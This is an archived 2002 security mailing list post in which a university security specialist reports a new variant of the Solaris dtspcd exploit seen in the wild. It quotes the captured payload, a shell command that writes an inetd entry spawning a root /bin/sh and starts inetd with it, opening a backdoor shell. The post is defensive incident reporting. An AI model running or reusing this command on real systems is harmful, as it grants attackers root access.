variation of the dtspcd exploit?

From: Nathan W. Labadie (ab0781at_private)
Date: Thu Feb 14 2002 - 13:07:10 PST

Next message: Dave Dittrich: "Re: Port 80 SYN flood-like behavior"

Previous message: SecLists: "NSDAP Solaris rootkit and tripwire report online"
Next in thread: Valdis.Kletnieksat_private: "Re: variation of the dtspcd exploit?"
Reply: Valdis.Kletnieksat_private: "Re: variation of the dtspcd exploit?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Until last week, all the dtspcd exploits I'd seen had been the same
(inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
around.  The ASCII output looks something like this:

/bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
/usr/sbin/inetd -s /tmp/z;
sleep 10;

A copy of the capture can be downloaded from here:
http://security.wayne.edu/downloads/dtspcd-1.cap

-- 
Nathan W. Labadie       | ab0781at_private	
Sr. Security Specialist | 313/577.2126
Wayne State University  | 313/577.1338 fax
C&IT Information Security Office: http://security.wayne.edu

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Dave Dittrich: "Re: Port 80 SYN flood-like behavior"
Previous message: SecLists: "NSDAP Solaris rootkit and tripwire report online"
Next in thread: Valdis.Kletnieksat_private: "Re: variation of the dtspcd exploit?"
Reply: Valdis.Kletnieksat_private: "Re: variation of the dtspcd exploit?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Feb 14 2002 - 16:08:47 PST